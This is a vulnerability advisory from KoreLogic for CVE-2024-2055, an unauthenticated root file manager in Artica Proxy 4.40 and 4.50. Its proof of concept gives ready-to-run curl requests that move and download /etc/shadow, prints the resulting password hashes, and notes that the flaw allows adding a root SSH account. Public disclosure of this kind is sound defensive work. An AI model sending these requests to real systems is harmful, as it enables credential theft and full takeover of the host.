Skip to main content
Security Advisory

Artica Proxy Unauthenticated File Manager Vulnerability

Advisory ID
KL-001-2024-003
CVE ID
CVE-2024-2055
Published
2024-03-05
Vendor
Artica

Affected Systems

Product
Artica Proxy
Version
4.40 and 4.50
Platform
Debian 10 LTS

Discovered By

Jim Becher (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.40 and 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel, CWE-552: Files or Directories Accessible to External Parties
CVE ID: CVE-2024-2055

Vulnerability Description

The “Rich Filemanager” feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user.

Technical Description

The Artica Proxy can be installed with a small amount of “Features” enabled. Within the administrative web interface, additional features can be installed, enabled, and disabled. The “Rich Filemanager” feature is disabled by default. Enabling this feature will spawn a listener on port 5000/tcp bound to 0.0.0.0. By default, when this feature is enabled, authentication is not required to access the web interface. The “Rich Filemanager” runs as the root user. This provides an unauthenticated attacker complete access to the file system.

  root@artica:~# ps -efww | grep -i File
  root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER
  root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER

This can be exploited by an attacker to add entries in to /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create an additional root-level account that has the ability to SSH in to the system.

Mitigation and Remediation Recommendation

No response from vendor. Rich Filemanager feature is disabled by default. Leave it that way.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

Step 1: Move /etc/shadow to /tmp/shadow

$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'
{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}

Step 2: Download /tmp/shadow

$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
daemon:*:19507:0:99999:7:::
bin:*:19507:0:99999:7:::
sys:*:19507:0:99999:7:::
sync:*:19507:0:99999:7:::
games:*:19507:0:99999:7:::
man:*:19507:0:99999:7:::
lp:*:19507:0:99999:7:::
mail:*:19507:0:99999:7:::
news:*:19507:0:99999:7:::
uucp:*:19507:0:99999:7:::
proxy:*:19507:0:99999:7:::
www-data:*:19507:0:99999:7:::
backup:*:19507:0:99999:7:::
list:*:19507:0:99999:7:::
irc:*:19507:0:99999:7:::
gnats:*:19507:0:99999:7:::
nobody:*:19507:0:99999:7:::
_apt:*:19507:0:99999:7:::
systemd-timesync:*:19507:0:99999:7:::
systemd-network:*:19507:0:99999:7:::
systemd-resolve:*:19507:0:99999:7:::
messagebus:*:19507:0:99999:7:::
quagga:*:19507:0:99999:7:::
apt-mirror:*:19507:0:99999:7:::
privoxy:*:19507:0:99999:7:::
ntp:*:19507:0:99999:7:::
redsocks:!:19507:0:99999:7:::
prads:*:19507:0:99999:7:::
freerad:*:19507:0:99999:7:::
vnstat:*:19507:0:99999:7:::
stunnel4:!:19507:0:99999:7:::
sshd:*:19507:0:99999:7:::
vde2-net:*:19507:0:99999:7:::
memcache:!:19507:0:99999:7:::
davfs2:*:19507:0:99999:7:::
ziproxy:!:19507:0:99999:7:::
proftpd:!:19507:0:99999:7:::
ftp:*:19507:0:99999:7:::
mosquitto:*:19507:0:99999:7:::
openldap:!:19507:0:99999:7:::
munin:*:19507:0:99999:7:::
msmtp:*:19507:0:99999:7:::
Debian-snmp:!:19507:0:99999:7:::
opendkim:*:19507:0:99999:7:::
avahi:*:19507:0:99999:7:::
glances:*:19507:0:99999:7:::
ArticaStats:!:19507:0:99999:7:::
netdata:!:19507:0:99999:7:::
mysql:!:19507:0:99999:7:::
postfix:!:19507:0:99999:7:::
squid:!:19507:0:99999:7:::
smokeping:!:19507:0:99999:7:::
unbound:!:19645:0:99999:7:::

Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition

$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'
{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}

The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Disclosure Timeline

KoreLogic requests vulnerability contact and secure communication method from Artica.

Artica Support issues automated ticket #1703011342 promising follow-up from a human.

KoreLogic again requests vulnerability contact and secure communication method from Artica.

KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!"

KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form.

KoreLogic requests CVE from MITRE.

MITRE issues automated ticket #1591692 promising follow-up from a human.

30 business days have elapsed since KoreLogic attempted to contact the vendor.

KoreLogic requests update on CVE from MITRE.

KoreLogic requests update on CVE from MITRE.

KoreLogic reaches out to alternate CNA for CVE identifiers.

45 business days have elapsed since KoreLogic attempted to contact the vendor.

Vulnerability details presented to AHA! (takeonme.org) by proxy.

AHA! issues CVE-2024-2055 to track this vulnerability.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt